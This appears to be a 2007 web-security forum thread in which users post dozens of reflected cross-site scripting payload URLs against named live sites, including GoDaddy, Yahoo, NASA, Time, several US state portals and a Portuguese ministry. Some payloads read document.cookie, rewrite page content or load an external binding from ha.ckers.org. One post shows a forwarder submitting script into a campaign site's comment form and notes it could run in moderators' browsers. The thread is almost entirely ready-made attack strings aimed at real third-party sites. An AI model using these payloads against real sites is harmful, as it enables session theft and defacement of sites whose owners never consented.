Yeah I know, this vuln is my favorite at the moment ;)
IE only
http://docs.google.com/File?id=ddh33ggd_4ndhddc

[[url=http://www.realpics.net/searchresults.php?name=sarah&type=1&match=0&dump=%22%3E%3C/a%3E%3Cbody%20onload=%22document.title='RealPics.net%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%20alert('XSS');%22%3E]www.realpics.net[/url]]
[[url=http://help.godaddy.com/search.php?topic_id=&prog_id=GoDaddysex%22%3E%3Cbody%20onload=%22document.title='help.godaddy.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%20alert('XSS');%22%3E%3Cdiv%20id=%22&q=%22%3E&x=0&y=0]help.godaddy.com[/url]]



Edited 1 time(s). Last edit at 02/25/2007 06:29AM by daltd.

http://www.stumbleupon.com/recover_password.php?entry='><script>alert(document.cookie)</script>

-peavey

--------------------------
http://www.hiredhacker.com

Lol, nice one christ1an!

http://www.knowledgestorm.co.uk/ksuk/SearchServlet?ksAction=Search&srchtype=key&kw=%22+style%3D%22-moz-binding%3Aurl%28+http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29

Thankfully, KnowledgeStorm gives us the complete list of other vulnerable sites at the bottom of the page, like http://techfinder.theinquirer.net/vnuinquirer/SearchServlet?ksAction=Search&srchtype=key&kw=%22+style%3D%22-moz-binding%3Aurl%28+http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29 or http://techfinder.vnunet.com/vnunet/SearchServlet?ksAction=Search&srchtype=key&kw=%22+style%3D%22-moz-binding%3Aurl%28+http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29

http://jobs.inqjobs.co.uk/careers/jobsearch/results?kAndEntire=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

And a few holes on Yahoo:

[movies.yahoo.com]
[http://myweb.yahoo.com/myresults/handler?chunks[]=TITLE%3D%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%26URL%3Dhttp%253A%252F%252Fwww.google.com%252F&mail=Email]
[myweb.yahoo.com]
[myweb.yahoo.com]
[http://myweb.yahoo.com/myresults/edit?u="><script>alert("xss")</script>]
[e.my.yahoo.com] - must not be signed in
http://tech.yahoo.com/sp?prod=test%27%2Balert%28%27XSS%27%29%2F%2F - click the Articles tab



Edited 1 time(s). Last edit at 03/16/2007 06:37PM by trev.

Hmm, the google docs XSS doesn't work anymore, can anyone confirm?

Yes, they added "content-disposition: attachment" header.

How does Google track these issues by the way?

Quote

http://eol.jsc.nasa.gov/scripts/sseop/photo.pl?mission=%3Cscript%3Ealert('xss by spyware - I love rockets =]')%3C/script%3E&roll=E&frame=12652

nasa xD



Edited 1 time(s). Last edit at 03/02/2007 07:31AM by Spyware.

christ1an - Every major company reads this site now. You name the search engine, they have someone from that company reading this site. So if it wasn't already clear, be careful what you post - people are reading.

- RSnake
Gotta love it. http://ha.ckers.org

http://www.dvidshub.net/?script=....%3Cscript%3Ealert('GTA%20ROCKS');%3C/script%3E

XSS made easy
https://www.dvbn.de/login.htm?error_message=Please%20send%20your%20credentials<script>alert('XSS')</script>

[[url=https://godaddy.com/gdshop/radio/order.asp?isc=%22%3E%3Cscript%3Edocument.title='GoDaddy.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%20alert('XSS');%3C/script%3E]www.godaddy.com[/url]]
[[url=http://godaddy.com/gdshop/radio/chat_app.asp?app%5Fhdr=99&isc=%22%3E%3Cbody%20onload=%22document.title='GoDaddy.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%20alert('XSS');%22%3E]www.godaddy.com[/url]]
[[url=http://godaddy.com/gdshop/radio/chat_frame.asp?ci=974&selectStream=%22%3E%3Cbody%20onload=%22javascript:document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%20alert('XSS');%22%3E]www.godaddy.com[/url]]
[[url=http://godaddy.com/gdshop/radio/chat_survey.asp?filedate=2007%5F03%5F07&app%5Fhdr=99&isc=%22%3E%3Cbody%20onload=%22document.title='GoDaddy.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%20alert('XSS');%22%3E]www.godaddy.com[/url]]
[[url=https://godaddy.com/gdshop/radio/strange_domains.asp?ci=3261&isc=%22%3E%3Cscript%3Edocument.title='GoDaddy.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%20alert('XSS');%3C/script%3E]www.godaddy.com[/url]]
[[url=https://godaddy.com/gdshop/radio/share.asp?ci=1115&isc=%22%3E%3Cscript%3Edocument.title='GoDaddy.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%20alert('XSS');%3C/script%3E]www.godaddy.com[/url]]
[[url=https://godaddy.com/gdshop/radio/photo_gallery.asp?isc=%22%3E%3Cscript%3Edocument.title='GoDaddy.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%20alert('XSS');%3C/script%3E]www.godaddy.com[/url]]
[[url=https://godaddy.com/gdshop/radio/popup_online.asp?isc=%22%3E%3Cscript%3Edocument.title='GoDaddy.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%20alert('XSS');%3C/script%3E]www.godaddy.com[/url]]
[[url=https://godaddy.com/gdshop/radio/popup_xm.asp?isc=%22%3E%3Cscript%3Edocument.title='GoDaddy.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%20alert('XSS');%3C/script%3E]www.godaddy.com[/url]]
[[url=https://godaddy.com/gdshop/radio/popup_ipod.asp?isc=%22%3E%3Cscript%3Edocument.title='GoDaddy.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%20alert('XSS');%3C/script%3E]www.godaddy.com[/url]]
[[url=https://www.godaddy.com/gdshop/radio/popup_wwbd.asp?isc=%22%3E%3Cscript%3Edocument.title='GoDaddy.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%20alert('XSS');%3C/script%3E&ci=6223]www.godaddy.com[/url]]
[[url=https://www.godaddy.com/gdshop/radio/popup_strange.asp?isc=%22%3E%3Cscript%3Edocument.title='GoDaddy.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%20alert('XSS');%3C/script%3E&ci=6223]www.godaddy.com[/url]]
[[url=https://www.godaddy.com/gdshop/radio/signup.asp?ci=5314&isc=%22%3E%3Cscript%3Edocument.title='GoDaddy.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%20alert('XSS');%3C/script%3E&ci=6223]www.godaddy.com[/url]]



Edited 1 time(s). Last edit at 03/02/2007 06:39PM by daltd.

XSS on a site of the Portuguese Minister of Education.
It seems that they have a lot to learn.

http://www.crie.min-edu.pt/?module=searchmodule&src=&section=143&action=search&search_string=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

@daltd: love that godaddy spread. every time I'm on their site I can almost feel xss screaming out at me, but I'm usually too busy screaming at their customer service on behalf of a client...

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 03/05/2007 06:40AM by tx.

http://www.flurl.com/search?q=%27+onmouseover%3Dalert(String.fromCharCode(88,83,83))+id%3D%27&type=all_types
http://www.actlocallysf.org/thankyou.php?mess=%3Cscript%3Ealert('xss')%3C/script%3Exss!

-tx @ lowtech-labs.org

http://my.imageshack.us/registration/?email1=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Need to be logged in for that one trev.

-bubbles
http://webmastertutorials.net

@bubbles,
works here without being logged in. Prob. FireFox only or something. Nice find.

@Spyware && Bubbles;

seems that the server escapes ' and " with a \ (which the alert function isn't too pleased about); I used alert(/xss/.source)... seems to work fine in IE7, FF2 and Opera9. Don't know if it is actually different when logged in though... Just my input ;)

http://my.imageshack.us/registration/?email1=%22%3E%3Cscript%3Ealert(/XSS/.source)%3C/script%3E

That works without having to log in. :)

bubbles, I don't have an account on imageshack. For me both versions work and I don't see any escaping. But maybe some servers in their cluster behave differently...

http://www.scribd.com/search/search?query=%3C%2Ftitle%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E

the youtube for documents...apparently

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

https://ebm.cheetahmail.com/r/regf2?aid=497540725&EMAIL=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
http://adage.com/mediaworks/article.php?article_id=115432';alert('XSS');'
http://www.emailthis.clickability.com/et/emailThis?clickMap=create&url=%22style=%22-moz-binding:url%28http://ha.ckers.org/xssmoz.xml%23xss%29



Edited 2 time(s). Last edit at 03/08/2007 10:00AM by trev.

http://www.hriders.com/results.php?ProductPre=all&ProductSuf=&s=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E
http://oes.openfind.com/cgi-bin/search/query.cgi?q=asdf&oq=OES&dbs=oes&fdate=&fsize=&fpath=&enc=&del=0&actdb=ALL&tmpl=%22;alert%28%27xss%27%29;a%3d%22&sortby=score&n=10
http://cha.so.163.com/so.php?q=%3C%2Ftitle%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
http://google.sina.com.hk/cgi-bin/webpage_full.cgi?word=%3Cscript%3Ealert%28%27xss%27%29%3c/script%3e&lr=lang_zh-TW
http://www.time.com/time/searchresults?N=0&Ntk=NoBody&Nty=1&Nr=OR%28p_record_type%3AArticle%2Cp_record_type%3Ablog%2Cp_record_type%3AOther%29&Ntt=%27;alert%28%27xss%27%29;//&btnSearch.x=29&btnSearch.y=17
http://search.she.com/index.cfm?s=%3cscript%3ealert%28%27xss%27%29%3c/script%3e&d=1&p=1
http://www.alexa.com/data/ds/preferences?q=%27%29%7c%7calert%28%27xss%27%29%29;// (click Save Preferences)

- Hong

[www.dol.gov]

[alabama.google.nicusa.com]
[az.gov]
[www.arkansas.gov]
[www.calbusiness.ca.gov]
[www.ct.gov]
[search1.georgia.gov]

[search.chacha.com]
^-- reported.

More votehillary.org thanks to whiteacid's post forwarder: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.votehillary.org/CMS/comment/reply/1355&edit%5Bsubject%5D=XSS!&edit%5Bcomment%5D=%22%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E&edit%5Bformat%5D=3&edit%5Bform_id%5D=comment_form&op=Preview+comment
Needless to say, changing op from 'Preview+comment' to 'Post+comment' opens the possibility of running script on the administrator/moderators browser

Geek2Geek (geek dating site):
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.gk2gk.com/account/login/index.asp?PROCESS=Y&REDIR=&MESSAGE=&WINK=&EVENT_ID=&LOGIN=%22%3E%3Cscript%3Ealert('xss')%3B%3C%2Fscript%3E%3Cp+id%3D&PASSWORD=%22%3E%3Cscript%3Ealert('xss')%3B%3C%2Fscript%3E%3Cp+id%3D
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.gk2gk.com/account/reminder/index.asp?PROCESS=Y&LOGIN=%22%3E%3Cscript%3Ealert('xss')%3B%3C%2Fscript%3E%3Cp+id%3D
http://www.gk2gk.com/profile/details.asp?USER=160373 <-Profile I set up, (afaik no fields are filtered)
EDIT: They deleted my logon information on that profile, but strangely didn't delete the profile so the first alert still displays when following that link

********NSFW************
and also more stile-pr0n:
http://www.stilemedia.com/?v=%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E%73%6F%6D%65%20%75%6E%61%75%74%68%6F%72%69%7A%65%64%20%6A%61%76%61%73%63%72%69%70%74 lol
http://www.stilemedia.com/?top20=1&range=3%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E

-tx @ lowtech-labs.org



Edited 5 time(s). Last edit at 03/10/2007 10:11PM by tx.

Warning... above links are actually a porn site.

:-\